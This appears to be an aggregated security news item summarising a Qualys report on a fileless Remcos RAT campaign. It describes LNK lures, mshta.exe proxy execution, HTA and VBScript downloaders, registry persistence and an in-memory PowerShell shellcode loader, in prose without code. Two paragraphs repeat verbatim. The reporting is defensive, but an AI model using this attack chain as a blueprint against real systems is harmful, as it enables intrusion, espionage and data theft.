CyberSecurity news
FlagThis
@blog.qualys.com
//
A new fileless malware campaign is deploying the Remcos RAT (Remote Access Trojan) using a PowerShell-based shellcode loader, highlighting the evolving tactics of cybercriminals. The attack begins with malicious LNK files embedded within ZIP archives, often disguised as legitimate Office documents to entice users into opening them. Upon execution, the attack chain leverages mshta.exe, a legitimate Microsoft tool, for proxy execution, allowing it to bypass traditional antivirus and endpoint defenses by running HTML Applications (HTA).
The mshta.exe then executes an obfuscated HTA file hosted on a remote server, which contains Visual Basic Script code designed to download a PowerShell script, a decoy PDF file, and another HTA file. Critically, the HTA file also configures Windows Registry modifications to ensure that the downloaded HTA file is automatically launched upon system startup, guaranteeing persistence. Once the PowerShell script is executed, it reconstructs a shellcode loader that ultimately launches the Remcos RAT payload entirely in memory.
This fileless technique, where malicious code operates directly in the computer's memory, allows the malware to evade many traditional security solutions that rely on disk-based detection. Remcos RAT grants attackers full control over compromised systems, allowing for cyber espionage and data theft through features like keylogging, screenshot capture, and clipboard monitoring. The RAT establishes a TLS connection to a command-and-control server for persistent communication, enabling data exfiltration and remote control.
References :
The mshta.exe then executes an obfuscated HTA file hosted on a remote server, which contains Visual Basic Script code designed to download a PowerShell script, a decoy PDF file, and another HTA file. Critically, the HTA file also configures Windows Registry modifications to ensure that the downloaded HTA file is automatically launched upon system startup, guaranteeing persistence. Once the PowerShell script is executed, it reconstructs a shellcode loader that ultimately launches the Remcos RAT payload entirely in memory.
This fileless technique, where malicious code operates directly in the computer's memory, allows the malware to evade many traditional security solutions that rely on disk-based detection. Remcos RAT grants attackers full control over compromised systems, allowing for cyber espionage and data theft through features like keylogging, screenshot capture, and clipboard monitoring. The RAT establishes a TLS connection to a command-and-control server for persistent communication, enabling data exfiltration and remote control.
Share:
References :
- Anonymous ???????? :af:: Experts reveal a fileless malware attack using PowerShell to execute Remcos RAT, employing LNK files and mshta.exe to evade detection, raising alarms about advanced evasion techniques in cybercriminal activities.
- securityonline.info: Stealthy Remcos RAT Campaign Uses PowerShell to Evade Antivirus Detection
- The Hacker News: Fileless Remcos RAT Delivered via LNK Files and MSHTA in PowerShell-Based Attacks
Classification:
- HashTags: #FilelessMalware #RemcosRAT #PowerShell
- Company: Qualys
- Target: Compromised Systems
- Product: PowerShell
- Feature: Fileless Execution
- Malware: Remcos RAT
- Type: Malware
- Severity: Major